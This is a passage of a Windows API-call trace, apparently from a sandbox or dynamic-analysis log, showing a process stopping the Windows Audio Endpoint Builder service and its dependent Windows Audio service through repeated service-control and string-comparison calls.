(Buffer=0x3112d78) returned 0x0 [0144.225] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x30bf7cc | out: Buffer=0x30bf7cc*=0x3122040) returned 0x0 [0144.225] OpenServiceW (hSCManager=0x31208a0, lpServiceName="AUDIOENDPOINTBUILDER", dwDesiredAccess=0xc) returned 0x31208c8 [0144.226] QueryServiceStatus (in: hService=0x31208c8, lpServiceStatus=0x30bf7d0 | out: lpServiceStatus=0x30bf7d0*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0xc1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0144.226] EnumDependentServicesW (in: hService=0x31208c8, dwServiceState=0x1, lpServices=0x3122040, cbBufSize=0xfa0, pcbBytesNeeded=0x30bf7c4, lpServicesReturned=0x30bf7c8 | out: lpServices=0x3122040*(lpServiceName="Audiosrv", lpDisplayName="Windows Audio", ServiceStatus.dwServiceType=0x10, ServiceStatus.dwCurrentState=0x4, ServiceStatus.dwControlsAccepted=0xc1, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x30bf7c4, lpServicesReturned=0x30bf7c8) returned 1 [0144.228] GetServiceDisplayNameW (in: hSCManager=0x31208a0, lpServiceName="AUDIOENDPOINTBUILDER", lpDisplayName=0x2c7820, lpcchBuffer=0x30bf7ac | out: lpDisplayName="Windows Audio Endpoint Builder", lpcchBuffer=0x30bf7ac) returned 1 [0144.229] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0144.229] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x3370002 [0144.229] FormatMessageW (in: dwFlags=0x2800, lpSource=0x3370002, dwMessageId=0xdca, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The following services are dependent on the Windows Audio Endpoint Builder service.\r\nStopping the Windows Audio Endpoint Builder service will also stop these services.\r\n") returned 0xa9 [0144.230] GetFileType (hFile=0x90) returned 0x2 [0144.230] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf770 | out: lpMode=0x30bf770) returned 1 [0144.627] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0xa9, lpNumberOfCharsWritten=0x30bf77c, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x30bf77c*=0xa9) returned 1 [0144.970] GetFileType (hFile=0x90) returned 0x2 [0144.970] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf770 | out: lpMode=0x30bf770) returned 1 [0145.198] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30bf77c, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x30bf77c*=0x2) returned 1 [0145.773] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=" %Fws", _ArgList=0x30bf7b4 | out: _Buffer=" Windows Audio") returned 16 [0145.774] GetFileType (hFile=0x90) returned 0x2 [0145.774] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf7a0 | out: lpMode=0x30bf7a0) returned 1 [0146.217] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x30bf7a4, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf7a4*=0x10) returned 1 [0146.438] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x30bf7ac | out: _Buffer="\r\n") returned 2 [0146.438] GetFileType (hFile=0x90) returned 0x2 [0146.439] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf798 | out: lpMode=0x30bf798) returned 1 [0146.665] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30bf79c, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf79c*=0x2) returned 1 [0147.228] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x30bf7b4 | out: _Buffer="\r\n") returned 2 [0147.228] GetFileType (hFile=0x90) returned 0x2 [0147.228] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf7a0 | out: lpMode=0x30bf7a0) returned 1 [0147.602] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30bf7a4, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf7a4*=0x2) returned 1 [0148.307] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0148.307] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0148.308] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0148.308] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120738 [0148.309] OpenServiceW (hSCManager=0x3120738, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120788 [0148.309] ControlService (in: hService=0x3120788, dwControl=0x4, lpServiceStatus=0x30bf740 | out: lpServiceStatus=0x30bf740*(dwServiceType=0x10, dwCurrentState=0x4, dwControlsAccepted=0xc1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0148.748] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x31186d0 [0148.748] wcscpy_s (in: _Destination=0x31186ec, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0148.748] CloseServiceHandle (hSCObject=0x3120738) returned 1 [0148.749] CloseServiceHandle (hSCObject=0x3120788) returned 1 [0148.749] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf724 | out: Buffer=0x30bf724*=0x31249f8) returned 0x0 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0148.749] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0148.750] wcsncpy_s (in: _Destination=0x3124bc6, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0148.750] wcsncpy_s (in: _Destination=0x3124bb4, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0148.750] NetApiBufferFree (Buffer=0x31186d0) returned 0x0 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0148.750] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0148.751] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0148.751] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0148.751] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0148.751] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0148.751] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0148.751] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0148.751] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0148.751] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0148.751] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3120698 [0148.751] OpenServiceW (hSCManager=0x3120698, lpServiceName="Audiosrv", dwDesiredAccess=0x20) returned 0x3120788 [0148.751] ControlService (in: hService=0x3120788, dwControl=0x1, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x2, dwWaitHint=0x1388)) returned 1 [0148.755] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118890 [0148.755] wcscpy_s (in: _Destination=0x31188ac, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0148.755] CloseServiceHandle (hSCObject=0x3120698) returned 1 [0148.755] CloseServiceHandle (hSCObject=0x3120788) returned 1 [0148.756] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf728 | out: Buffer=0x30bf728*=0x31250b0) returned 0x0 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0148.756] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0148.757] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0148.757] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0148.757] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0148.757] NetApiBufferFree (Buffer=0x3118890) returned 0x0 [0148.757] GetServiceDisplayNameW (in: hSCManager=0x31208a0, lpServiceName="Audiosrv", lpDisplayName=0x2c7820, lpcchBuffer=0x30bf730 | out: lpDisplayName="Windows Audio", lpcchBuffer=0x30bf730) returned 1 [0148.759] FormatMessageW (in: dwFlags=0x2800, lpSource=0x3370002, dwMessageId=0xdc7, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The Windows Audio service is stopping") returned 0x25 [0148.759] GetFileType (hFile=0x90) returned 0x2 [0148.759] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6f4 | out: lpMode=0x30bf6f4) returned 1 [0149.233] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x30bf700, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x30bf700*=0x25) returned 1 [0149.688] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0149.688] GetFileType (hFile=0x90) returned 0x2 [0149.688] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0150.217] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0150.859] Sleep (dwMilliseconds=0x9c4) [0153.456] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0153.456] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0153.457] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0153.457] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0153.457] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0153.457] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0153.457] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0153.457] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0153.527] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0153.535] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0153.535] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0153.545] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0153.545] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x31206e8 [0153.553] OpenServiceW (hSCManager=0x31206e8, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x3120670 [0153.553] ControlService (in: hService=0x3120670, dwControl=0x4, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x3, dwWaitHint=0x1388)) returned 0 [0153.553] GetLastError () returned 0x425 [0153.553] QueryServiceStatus (in: hService=0x3120670, lpServiceStatus=0x30bf6d0 | out: lpServiceStatus=0x30bf6d0*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x3, dwWaitHint=0x1388)) returned 1 [0153.554] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x3118890 [0153.554] wcscpy_s (in: _Destination=0x31188ac, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0153.554] CloseServiceHandle (hSCObject=0x31206e8) returned 1 [0153.554] CloseServiceHandle (hSCObject=0x3120670) returned 1 [0153.554] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x30bf6e8 | out: Buffer=0x30bf6e8*=0x31250b0) returned 0x0 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0153.554] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0153.555] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0153.555] wcsncpy_s (in: _Destination=0x312527e, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0153.555] wcsncpy_s (in: _Destination=0x312526c, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0153.555] NetApiBufferFree (Buffer=0x3118890) returned 0x0 [0153.555] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=".", _ArgList=0x30bf700 | out: _Buffer=".") returned 1 [0153.555] GetFileType (hFile=0x90) returned 0x2 [0153.555] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x30bf6ec | out: lpMode=0x30bf6ec) returned 1 [0153.905] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x30bf6f0, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x30bf6f0*=0x1) returned 1 [0154.238] Sleep (dwMilliseconds=0x9c4) [0156.969] NetApiBufferFree (Buffer=0x31250b0) returned 0x0 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0156.969] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 